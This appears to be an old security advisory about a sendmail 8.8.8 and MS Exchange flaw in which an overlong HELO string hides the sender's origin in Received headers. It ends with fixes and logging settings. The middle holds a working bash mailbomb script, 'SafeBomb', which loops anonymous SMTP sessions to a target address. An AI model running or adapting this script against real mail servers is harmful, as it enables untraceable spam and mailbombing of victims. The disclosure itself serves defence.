COMMAND
sendmail
SYSTEMS AFFECTED
Systems running sendmail 8.8.8 (and prior) and MS Exchange
PROBLEM
Michal Zalewski found following recently. When someone mailbombs
you, or tries to send fakemail, spam, etc - sendmail normally
attachs sender's host name and it's address to outgoing message:
--
From spam@flooders.net Mon Jan 5 22:08:21 1998
Received: from spammer (marc@math.university.edu [150.129.84.5])
by myhost.com (8.8.8/8.8.8) with SMTP id WAA00376
for lcamtuf; Mon, 5 Jan 1998 22:07:54 +0100
Date: Mon, 5 Jan 1998 22:07:54 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>
MAILBOOM!!!
--
That's perfect - now you know, who is responsible for that
annoying junk in your mailbox: "Received: from spammer
(marc@math.university.edu [150.129.84.5])". Nothing easier...
But Zalewski found a small hole, which allows user to hide it's
personality, and send mails anonymously. The only thing you should
do is to pass HELO string longer than approx. 1024 B - sender's
location and other very useful information will be cropped!!!
Message headers should become not interesting. Sometimes, sender
may become quite untraceable (but not always, if it's possible to
obtain logs from machine which has been used to sent):
--
From spam@flooders.net Mon Jan 5 22:09:05 1998
Received: from xxxxxxxxxxxxxx... [a lot of 'x's] ...xxxx
Date: Mon, 5 Jan 1998 22:08:52 +0100
From: spam@flooders.net
Message-Id: <3.14159665@pi>
MAILBOOM!!! Now guess who am I...
--
Here's a simple example of Sendmail's HELO hole usage. Note, this
script has been written ONLY to show how easy may be sending
fakemails, mailbombs, with cooperation of Sendmail. Script is
very slow and restricted in many ways, but explains the problem
well (note, some of non-Berkeley daemons are also affected):
#!/bin/bash
TMPDIR=3D/tmp/`whoami`
PLIK=3D$TMPDIR/.safe
TIMEOUT=3D2
LIMIT=3D10
MAX=3D20
echo
echo "SafeBomb 1.02b -- sendmail HELO hole usage example"
echo "Author: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>"
echo
if [ "$4" =3D "" ]; then
echo "USAGE: $0 msgfile address server sender"
echo
echo " msgfile - file to send as a message body"
echo " address - address of lucky recipient"
echo " server - outgoing smtp server w/sendmail"
echo " sender - introduce yourself"
echo
echo "WARNING: For educational use ONLY. Mailbombing is illegal."
echo "Think twice BEFORE you use this program in any way. Also,"
echo "I've never said this program is 100% safe nor bug-free."
echo
sleep 1
exit 0
fi
if [ ! -f $1 ]; then
echo "Message file not found."
echo
exit 0
fi
echo -n "Preparing message..."
mkdir $TMPDIR &>/dev/null
chmod 700 $TMPDIR
echo "echo \"helo =
_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa=
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb=
omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb=
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s=
afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe=
bomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebom=
b__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__=
safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__saf=
ebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebo=
mb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb_=
_safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__sa=
febomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safeb=
omb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb=
__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__s=
afebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safebomb__safe=
bomb_\"" >$PLIK
echo "echo \"mail from: \\\"$4\\\"\"" >>$PLIK
echo "echo \"rcpt to: $2\"" >>$PLIK
echo "echo \"data\"" >>$PLIK
echo "cat <<__qniec__" >>$PLIK
cat $1 >>$PLIK
echo "__qniec__" >>$PLIK
echo "echo \".\"" >>$PLIK
echo "echo \"quit\"" >>$PLIK
echo "sleep $TIMEOUT" >>$PLIK
chmod +x $PLIK
echo "OK"
echo "Sending $1 (as $4) to $2 via $3 -- Ctrl+Z to abort."
SENT=3D0
while [ -f $1 ]; do
$PLIK|telnet $3 25 &>/dev/null &
let SENT=3DSENT+1
echo -ne "Sent: $SENT\b\b\b\b\b\b\b\b\b\b\b\b\b"
CONNECTED=3D`ps|grep -c "telnet $3"`
if [ "$LIMIT" -le "$CONNECTED" ]; then
while [ "$LIMIT" -le "$CONNECTED" ]; do
sleep 1
done
fi
if [ "$SENT" -ge "$MAX" ]; then
echo "It's just an example, sorry."
echo
exit 0
fi
done
This bug has been confirmed for MS Exchange too!
SOLUTION
This bug was fixed in version 8.9.0 of sendmail. It limits the
size of the HELO/EHLO parameter to prevent spammers from hiding
their connection information in Received: headers. The current
version is available at:
ftp://ftp.sendmail.org/pub/sendmail/
Suggested fix: insert additional length limit into HELO/EHLO
parameter scanning routine OR disable AllowBogusHELO (but it may
cause serious troubles). Now, if we want to keep track of such
exploit attempts, we have to compile sendmail 8.8.8 with a
PICKY_HELO_CHECK defined in conf.h:
#define PICKY_HELO_CHECK 1
This will force sendmail to syslog an authentication warning
(message with LOG_INFO level) and include an
X-Authentication-Warning: header in the message, saying what host
tried to hide itself. Check out the source (srvrsmpt.c, main.c).
Also, LogLevel must be set to a value higher than 3 (default is 9)
in sendmail.cf. BTW, qmail is not vulnerable.